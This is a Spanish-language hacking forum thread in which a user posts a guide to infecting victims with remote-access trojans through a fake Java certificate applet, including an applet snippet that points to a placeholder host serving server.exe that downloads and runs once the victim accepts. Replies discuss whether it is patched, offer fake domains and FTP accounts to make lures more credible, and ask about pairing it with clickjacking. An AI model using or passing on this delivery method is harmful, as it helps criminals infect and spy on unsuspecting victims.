Infectar mediante JavaFake by Devilboy

Iniciado por Neekiinh0, Julio 23, 2010, 08:52:27 PM

Tema anterior - Siguiente tema

0 Miembros y 2 Visitantes están viendo este tema.

Julio 23, 2010, 08:52:27 PM Ultima modificación: Noviembre 04, 2014, 06:37:08 AM por blackdrake
Bueno les vengo con esta guia que la probe y me andubo a la perfeccion y se las traigo para ustedes.

1- Primero que nada necesitamos un Troyano, ya sea CyberGate, Spy-Net, Bifrost o el que quieran.

2- Un servidor de descarga DIRECTA, este es el mejor: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

3- Una animacion flash, un script html y un certificado falso de Java aqui lo tienen elijan el servidor que quieran para descargarlo: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

4- Ahora cambian esta parte del code por su URL sel server:

Código: php
<applet name="link" code="Inicio.class" archive="link.jar" height="10" width="1">
      <param name="url" value="http://tu-web.com/server.exe">
    </applet>


Cambian esto:

Código: php
http://tu-web.com/server.exe



IMPORTANTE: DEBEN TENER UN HOST PARA ALOJAR TODOS LOS ARCHIVOS.


Al aceptar el certificado automaticamente se les baja el server y se lo ejecuta a la victima.

Saludos.

Excelente post!
Pero esto ya no funciona ya fue parcheado.
En caso de que este errado y alguien lo haya probado actualmente y le haya funcionado por favor que lo haga saber.

Saludos y gracias por traerlo Neekiinh0


bueno a mi no me funciona, creo que codeare un poco aver si logro areglarlo.

ohhhhh :O vas a codear esto XDDDD ???---->
Código: php
<applet name="link" code="Inicio.class" archive="link.jar" height="10" width="1">
      <param name="url" value="http://tu-web.com/server.exe">
    </applet>


jajaj que me caigo :D

Dios que de tiempo...  yo hasta tengo un dominio fake para que apareciera de remitente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Ahora que lo pienso puedo proporcionar cuentas ftp y subdominio de ese mismo domain... ex: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta xD cosas por el estilo para que sea más creible ^^
Quien quiera que me contacte por MP xD
PD: Buen aporte, creí que estaba por el foro por eso no lo posteaba...
Saludos

Pero seguimos dando vuelta en lo mismo! Esto no funiona ya!!! xD


xDDD no lo leí sorry... y hasta ahora no sabia que fué parcheado, fue bonito mientras duró xD!

A Mi Me Funciona Lo eh probado con todos los SO esta detectado eso se pero sigue funcionando.

Si funciona xDDDDD muchos lo usan con el clickjacking :l

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Si funciona xDDDDD muchos lo usan con el clickjacking :l

Hola disculpa las molestias.
Estube viendo eso de click jacking y queria ver como es el tema justamente para implementarlo con el JavaFake.
Ya que si se utiliza con el Js de JavaFake el cartel saldria no de la web iframe sino en la web principal, en la capa principal del clickjacking y donde aparece nuestro boton.

¿Alguien a implementado el Método con clickjacking y JavaFake?
Gracias por las respuestas. Saludos a todos

el metodo aún funciona pero es detectado por los AV´s

Veo Una Energia Que Con Deceo de Justicia... Veo Mas Alla de LAs Letras Escritas...
Veo Un Hacktivismo Puro... Nacido De lo Mas Profundo De un Corazon..
Con La Mirada Firme En Defender Mis Ideales...


Gracias No Entiendo Bien unso Dicen qe Si Funciona Otros Que No? xD


Toca Ver =D!